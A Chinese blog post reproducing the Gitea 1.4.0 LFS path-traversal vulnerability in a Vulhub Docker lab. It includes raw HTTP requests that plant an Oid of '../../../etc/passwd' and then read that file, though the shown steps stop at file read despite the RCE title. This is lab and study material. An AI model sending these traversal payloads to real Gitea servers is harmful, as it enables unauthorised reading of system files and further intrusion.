Gitea 1.4 未授权远程代码执行漏洞复现

Gitea 1.4 未授权远程代码执行漏洞复现

Gitea 1.4 未授权远程代码执行

一、漏洞描述

Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。

二、影响版本

1.4.0

三、环境准备&&漏洞复现

Vulhub进行搭建

https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce安装镜像docker-compose up -d

环境启动成功

v2-18740affdaadc73a0937b61c1f04ddcf_1440w.png

初始化配置:

http://192.168.1.108:3000/install

v2-35a1238d54bf36f2fc6c9d54ed4ffa98_1440w.png

其他默认设置一下管理员账户密码:

v2-8ea8c692dc800ed9ba4713edfffd6cef_1440w.png

初始化完成成功进去面板

v2-5c4e3a8318d7c72ed3bc53e9b08d47c4_1440w.png

安装完成后,新建一个用户,然后创建一个公开的仓库

v2-1835bb2f32ae371ec8d8e2505eb116aa_1440w.png

创建一个公开的仓库

v2-ce9664fde89f6f5a5f91d379e07986f5_1440w.png

仓库创见成功

v2-20f21e4d9deeedbdd76165840a32caff_1440w.png

需要重启一下重启gitea服务

docker-compose restart

v2-17a68476e45057fb315a19eca7609203_1440w.png

漏洞验证:

v2-67bd5461cb1cf6a675afc7dbe8459f8b_1440w.png

具体数据包:

POST/lostworld/getpasswd.git/info/lfs/objectsHTTP/1.1Host: 192.168.1.108:3000Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: application/vnd.git-lfs+jsonAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: lang=zh-CN; i_like_gitea=7b3a3994aeff5ed0; _csrf=lA-gqD5gapHJeeQEz_XUOsejTSY6MTYwOTk4NzQ3MTAwNDc0MzE3OQ%3D%3DConnection: closeContent-Length: 153​{"Oid":"....../../../etc/passwd","Size":1000000,"User":"a","Password":"a","Repo":"a","Authorization":"a"}

出现401说明发送数据包LFS对象已经创建成功,且其Oid为....../../../etc/passwd。

访问路径

http://192.168.1.108:3000/admins/test.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth

v2-4bb7d16362df49a3faf2b4407031c374_1440w.png

具体读取数据包

GET/lostworld/getpasswd.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sthHTTP/1.1Host: 192.168.1.108:3000Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: lang=zh-CN; i_like_gitea=19fae7187e6a86e2; _csrf=y0uGd4qsOuq8esEW9S4hXHWRGHo6MTYwOTk4ODAwNzczODc4NzI3MQ%3D%3DConnection: close


回复列表



回复操作

正在加载验证码......

请先拖动验证码到相应位置

发布时间:2021-02-13 13:35:00

修改时间:2021-02-13 13:35:00

查看次数:139

评论次数:0